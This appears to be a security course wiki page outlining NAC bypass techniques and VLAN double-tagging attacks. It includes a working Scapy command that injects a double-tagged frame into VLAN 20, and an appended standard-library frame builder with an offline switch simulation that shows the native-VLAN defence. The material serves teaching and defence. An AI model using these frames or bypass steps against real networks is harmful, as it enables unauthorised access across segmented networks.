Network Vulnerabilities: NAC Bypass and VLAN Hopping - Paiet/SEC-335 GitHub Wiki
- NAC bypass
  - NAC grants access based on rules (posture checks on the connecting device)
    - Rules can check
      - Antivirus definition versions
      - Applied patches
      - Software versions
      - Any combination of the above
  - NAC can be bypassed by...
    - Pretending to be a whitelisted device
      - Some devices can't participate in NAC (no agent or 802.1X supplicant) and are let in by a MAC-address whitelist instead
        - Network printers
        - VoIP phones
      - Unplug such a device and use its Ethernet port
      - Spoof the IP and/or MAC of the whitelisted device
    - MitM attack
      - Compromise an authorized device and relay through it
    - Use IPv6
      - Some admins overlook IPv6 when setting up their NAC, so IPv6 traffic is not subject to the same checks
    - Use a rogue AP
      - NAC-authorized device connects to the rogue AP
      - Attacker compromises the authorized device
      - Attacker uses the compromised device as a relay into the NAC-protected network
- VLAN hopping
  - Used to defeat VLAN segregation
  - Frogger the VLAN Hopper (script that automates VLAN hopping)
  - VLAN double-tagging
    - Adding a second 802.1Q VLAN tag to the Ethernet frame
    - Allows you to perform the VLAN hopping attack
    - Attacker must be on the native VLAN of the trunk (the outer tag carries the native VLAN ID)
    - One-way only: replies from the target VLAN are not double-tagged back, so the attacker gets no return traffic (good for blind injection, not for interactive sessions)
  - VLAN hopping
    - Because of the double-tagged frame
      - SwitchA receives the double-tagged frame and strips off the outer tag
      - The native VLAN is carried untagged on the trunk, so no tag is re-added
      - SwitchA forwards the frame to SwitchB over the trunk link
      - SwitchB sees the remaining (inner) tag for the desired VLAN and forwards the frame into that VLAN, to the victim
    - Defence: move the trunk native VLAN to an unused VLAN and tag native traffic (Cisco: `vlan dot1q tag native`)
  - Craft attack with Scapy

    ```python
    from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

    # Outer tag = native VLAN 1 (stripped by SwitchA), inner tag = target VLAN 20.
    # Needs root for the raw socket; eth0 must sit on an access port in the native VLAN.
    sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:50:56:39:25:60') /
          Dot1Q(vlan=1) / Dot1Q(vlan=20) /
          IP(dst='255.255.255.255', src='10.0.0.166') / ICMP(),
          iface='eth0')
    ```

    - Breakdown of the command
      - Source MAC address: 00:50:56:39:25:60
      - Destination MAC address: broadcast
      - Outer VLAN tag: 1 (native VLAN, removed by SwitchA on trunk egress)
      - Inner VLAN tag: 20 (target VLAN, read by SwitchB)
      - Source IP address: 10.0.0.166
      - Destination IP address: broadcast
      - Outgoing interface: eth0
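The following is an added example, not code from the wiki page or from Scapy: it builds the same double-tagged ICMP frame as the Scapy one-liner with only the standard library, then models the two switch hops (SwitchA stripping the native-VLAN outer tag on trunk egress, SwitchB reading the tag that remains) so you can check offline which VLAN the victim-side switch delivers into. The MACs, IPs and VLAN IDs are the ones from the command above; the switch model is a simplification that assumes the attacker's access port is in the native VLAN and the trunk carries the native VLAN untagged.

```python
# Added example (not from the wiki page): byte-level 802.1Q double tagging and a
# minimal model of how the two switches treat the frame.
import struct

ETH_P_8021Q = 0x8100   # TPID that introduces an 802.1Q tag
ETH_P_IP = 0x0800

# Values taken from the Scapy command on this page.
ATTACKER_MAC = "00:50:56:39:25:60"
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ATTACKER_IP = "10.0.0.166"
BROADCAST_IP = "255.255.255.255"
NATIVE_VID = 1
TARGET_VID = 20


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def inet_checksum(data):
    """RFC 1071 one's-complement checksum used by the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(src_ip, dst_ip, payload=b"double-tag test"):
    """IPv4 header + ICMP echo request, the equivalent of IP()/ICMP() in Scapy."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                         ip_bytes(src_ip), ip_bytes(dst_ip))
    ip_hdr = ip_hdr[:10] + struct.pack("!H", inet_checksum(ip_hdr)) + ip_hdr[12:]
    return ip_hdr + icmp


def build_double_tagged_frame(src_mac, dst_mac, outer_vid, inner_vid, payload):
    """Ether()/Dot1Q(outer)/Dot1Q(inner)/payload. Each tag is TPID 0x8100 followed by
    a 16-bit TCI; with PCP=0 and DEI=0 the TCI is just the 12-bit VID."""
    def tag(vid):
        return struct.pack("!HH", ETH_P_8021Q, vid & 0x0FFF)
    return (mac_bytes(dst_mac) + mac_bytes(src_mac)
            + tag(outer_vid) + tag(inner_vid)
            + struct.pack("!H", ETH_P_IP) + payload)


def vlan_tags(frame):
    """Return the list of VIDs on a frame, outermost first."""
    vids, off = [], 12
    while struct.unpack("!H", frame[off:off + 2])[0] == ETH_P_8021Q:
        vids.append(struct.unpack("!H", frame[off + 2:off + 4])[0] & 0x0FFF)
        off += 4
    return vids


def trunk_egress(frame, native_vid):
    """SwitchA putting the frame on its trunk: native-VLAN frames leave the trunk
    untagged, so the outer tag is removed and nothing is re-added. Any other VLAN
    keeps its tag, which is why the attacker must be in the trunk's native VLAN."""
    vids = vlan_tags(frame)
    if vids and vids[0] == native_vid:
        return frame[:12] + frame[16:]   # drop the 4-byte outer tag
    return frame


def trunk_ingress_vlan(frame, native_vid):
    """SwitchB receiving on the trunk: the outermost tag (or the native VLAN, if the
    frame is untagged) decides which VLAN the frame is flooded into."""
    vids = vlan_tags(frame)
    return vids[0] if vids else native_vid


def simulate_hop(attacker_vid, trunk_native_vid):
    """Return the VLAN the victim-side switch delivers the attacker's frame into."""
    frame = build_double_tagged_frame(ATTACKER_MAC, BROADCAST_MAC, attacker_vid,
                                      TARGET_VID, build_icmp_echo(ATTACKER_IP, BROADCAST_IP))
    on_trunk = trunk_egress(frame, trunk_native_vid)
    return trunk_ingress_vlan(on_trunk, trunk_native_vid)


if __name__ == "__main__":
    print("attacker in native VLAN:     delivered to VLAN", simulate_hop(NATIVE_VID, NATIVE_VID))
    print("trunk native VLAN moved to 99: delivered to VLAN", simulate_hop(NATIVE_VID, 99))
```

The second call in the `__main__` block is the defensive case: once the trunk's native VLAN is changed to an unused one, SwitchA leaves the outer tag in place, SwitchB forwards into VLAN 1 rather than VLAN 20, and the hop fails.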